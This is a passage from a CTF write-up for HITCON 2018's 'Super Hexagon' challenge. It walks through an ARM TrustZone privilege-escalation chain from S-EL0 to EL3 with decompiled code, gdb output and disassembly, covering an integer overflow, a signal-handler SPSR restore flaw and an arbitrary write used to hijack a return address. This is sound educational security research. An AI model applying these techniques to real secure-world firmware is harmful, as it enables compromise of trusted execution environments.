To solve S-EL0 we performed some significant reversing on the syscall and securecall interaces of S-EL1. When moving on to S-EL1, my first intuition was to examine the precise operation of the munmap and mmap handlers. These interested me because both secure and normal world pages could be mapped into the virtual address space. Both mmap and map_world_shared_memory store physical pages into the same table. However, the munmap syscall is identical to the securecall, and doesn’t special-case pages from different worlds. Thinking along those lines, the first bug I noticed was inside map_world_shared_memory. It validates that physaddr < 0x40000000, preventing users from mapping pages below the VIRT_MEM assigned by QEMU.

while ( 1 )
{
    if ( !len )
        return 0;
    if ( sel1_update_page_table(virtaddr, physaddr, prot) == -1 )
        break;
    virtaddr += 0x1000;
    physaddr += 0x1000;
    len -= 4096;
}

However later, there’s no checking for integer overflow. Making a call like map_wsm(0xFFFFF000, 0x2000) would result in a virtual address corresponding to first page of EL3 becoming accessible to our S-EL0 shellcode. And in fact, that does happen! But there’s a catch - Since the pages are mapped VIRT_FLASH, QEMU will allow reads but silently (!) drops writes (without faulting) to that address range. Confusingly, gdb can still write to those pages, likely since the QEMU gdbserver doesn’t distinguish between physical page types.

gef> x/i $pc
=> 0x237d318:   str     r3, [r1]
gef> x/xw $r1
0x237c80c:      0x91000042
gef> p $r3
$12 = 0x41414141
gef> stepi
gef> x/xw $r1
0x237c80c:      0x91000042

Taking a step back, it’s likely that any S-EL1 bugs would be present in a syscall, or at least require the use of a syscall. This would require players to have to pwn S-EL0 first, which makes sense from the standpoint of the CTF. One interesting syscall is signal, which allows the trusted application to define a signal handler. The HITCON blob uses this to catch errors and populate the user’s buffer with an error code and string.

signed int sel1_set_signal_handler(int a1, unsigned int a2)
{
  if ( a2 < 0x2400000 && a1 == 11 )
    sel0_sighandler_addr = a2;
  return -1;
}

S-EL1 stores the user’s argument in a global in its memory. Whenever a data or prefetch abort occurs, execution flows to sel1_handle_signal to check for the presence of a defined handler. That function will determine whether the handler is thumb or arm mode (checking the bottom bit) and populate state accordingly.

0x08001588             sel1_data_abort
0x08001588 STR             LR, [SP,#0x3C] ; Store to Memory
0x0800158C MRS             LR, SPSR ; Transfer PSR to Register ; <---- [A]
0x08001590 STR             LR, [SP,#0x40] ; Store to Memory
0x08001594 CPS             #0x13   ; Change Processor State
0x08001598 BL              sel1_save_regs ; Branch with Link
0x0800159C  ---------------------------------------------------------------------------
0x0800159C LDR             R8, [SP,#0x44] ; Load from Memory
0x080015A0 CPS             #0x1F   ; Change Processor State
0x080015A4 MOV             SP, R8  ; Rd = Op2
0x080015A8 MOV             R0, #0x17 ; Rd = Op2
0x080015AC BLX             sel1_handle_signal ; Change stored pc to saved handler
0x080015B0 B               sel1_return_from_interrupt

0x0800187C             sel1_return_from_interrupt
0x0800187C CPS             #0x13   ; Change Processor State
0x08001880 LDR             R0, [SP,#arg_40] ; Load from Memory
0x08001884 MSR             SPSR_cxsf, R0 ; Transfer Register to PSR  ; <---- [B]
0x08001888 B               loc_8001870


0x08001870 BL              sel1_restore_regs
0x08001874 LDR             LR, [SP,#0x3C] ; Load from Memory
0x08001878 MOVS            PC, LR  ; Rd = Op2

sel1_handle_signal primarily is responsible for overwriting the saved PC value. Though this is a data abort handler, it actually looks most similar to a syscall handler, and reuses a lot of code from that. However, data aborts can occur in either S-EL0 or in S-EL1. At point A, the handler saves off the existing SPSR value, containing the current exception level, onto the stack. Later at B, it unambiguously restores to that saved state! The duplicated path from the syscall handler didn’t account for the fact that a syscall in S-EL1 would return to EL3, but a data abort in S-EL1 still returns to S-EL1.

In other words, if we define a signal handler in S-EL0 then trigger a data abort in S-EL1, we’ll execute our shellcode with S-EL1’s exception level.

EL3: Escaping the matrix

EL3 is the final frontier for our challenge. At this point I’d done a reasonable amount of reversing on it already to determine where other exception levels were mapped and how securecalls are passed back and forth through the secure monitor code. After performing system setup, the actual core of EL3 is very small, mainly serving as a shuttling secure monitor service between normal and secure worlds. To this end, S-EL1 is capable of pointing its TTEs at EL3 pages to get an accessible mapping. However, the EL3 code executes directly off the read-only VIRT_FLASH pages, so we cannot write to its codepages directly.

Let’s examine code responsible for shuttling a secure call between worlds, in pursuit of a suitable write target.

if ( cmd != 0x83000007 )
{
  sub_D28();
  sub_310();
}
el3_switch_world(0);
retvalptr = el3_get_world_scratch(1u);
el3_set_current_world(1u);
el3_set_el1_sp(1u);
*retvalptr = v9;
result = retvalptr;

This code is responsible from returning to Normal World’s with an error code. It retrieves a pointer to the Normal World’s (id 1) saved execution state, then overwrites the stored x0 register value. It also transitions back to Normal World before returning.

QWORD * el3_get_world_scratch(unsigned int a1)
{
  return *(_QWORD **)(0xE002410 + 8i64 * a1);
}

As we can see, the scratch buffers are stored as the first two qwords in an array at 0xE002410. This page is within the VIRT_SECURE_MEM physical page range, so we can point to it in our S-EL1 TTE to read and write its contents. If we write a pointer to 0xE002418, we obtain arbitrary write by returning a 64bit value from Secure World. ASLR isn’t enabled on the EL3 stack, so it’s easy enough to clobber the saved return address and jump directly to our shellcode payload running in EL3.

Parting Thoughts

Over the past several years, CTFs have become increasingly involved and reflective of real world vulnerability research. CTF is a common route for new talent to break into the industry, and for professionals to use their skills in competition. Challenges are often written based on inspiration from bugs the authors have seen elsewhere, and Super Hexagon definitely felt that way to me.

HITCON is always one of the top CTFs of the year, and 2018 did not disappoint. The organizers had forgone having a final that year and so the challenges during the online event were all difficult and novel. I would consider it one of my favorite events of the year, and based on recent updates to their website, it appears that HITCON 2019 will be taking place. I’d encourage anyone who has made it this far to participate.

Until then, you can find my full solution scripts and notes for Super Hexagon on my Github here.

Other Writeups

Super Hexagon: A Journey from EL0 to S-EL3, by Grant Hernandez (Kernel Sanders)

PPP’s writeup

Balsn’s writeup